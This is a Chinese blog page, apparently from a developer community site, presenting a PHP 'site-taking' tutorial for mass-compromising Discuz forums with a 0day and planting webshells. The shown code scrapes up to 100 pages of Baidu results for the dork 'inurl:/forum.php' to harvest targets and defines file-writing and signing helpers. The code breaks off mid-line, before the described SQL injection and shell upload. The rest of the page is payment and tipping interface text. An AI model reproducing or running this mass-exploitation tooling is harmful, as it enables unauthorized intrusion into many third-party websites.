php 拿站教程,0day批量拿站webshell,挖掘机是这样练成的。

本文提供了一个PHP教程,详细讲解了如何通过搜索引擎关键词获取目标网站,并利用0day漏洞批量获取Webshell。通过设置搜索关键字、处理百度搜索结果,构造SQL注入语句,逐步解析数据库表前缀和sitekey,最后上传并获取shell位置。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

error_reporting(E_ERROR);

set_time_limit(0);

$keyword = 'inurl:/forum.php';//百度搜索关键字

$timeout = 10; //读取网页超时(秒)

$stratpage = 1; //读取百度起始页

$lastpage = 100; //读取百度尾页

function ReadBaiduList($keyword,$timeout,$nowpage) //返回该页DZ网址列表Array

{

$tmp = array();

$data = '';

$nowpage = ($nowpage-1)*10;

$fp = @fsockopen('www.baidu.com',80,$errno,$errstr,$timeout);

@fputs($fp,"GET /s?wd=".urlencode($keyword)."&pn=".$nowpage." HTTP/1.1\r\nHost:www.baidu.com\r\nConnection: Close\r\n\r\n");

while ($fp && !feof($fp))

$data .= fread($fp, 1024);

@fclose($fp);

preg_match_all("/\}\)\" href\=\"http\:\/\/([^~]*?)\" target\=\"\_blank\"/i",$data,$tmp);

$num = count($tmp[1]);

$array = array();

for($i = 0;$i < $num;$i++)

{

$row = explode('/',$tmp[1][$i]);

$array[] = str_replace('http://','',$row[0]);

}

return $array;

}

function fw($filename,$filecode,$filemode)

{

$handle = @fopen($filename,$filemode);

$key = @fputs($handle,$filecode);

@fclose($handle);

return $key;

}

function sign($exp_str)

{

return md5("attac

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值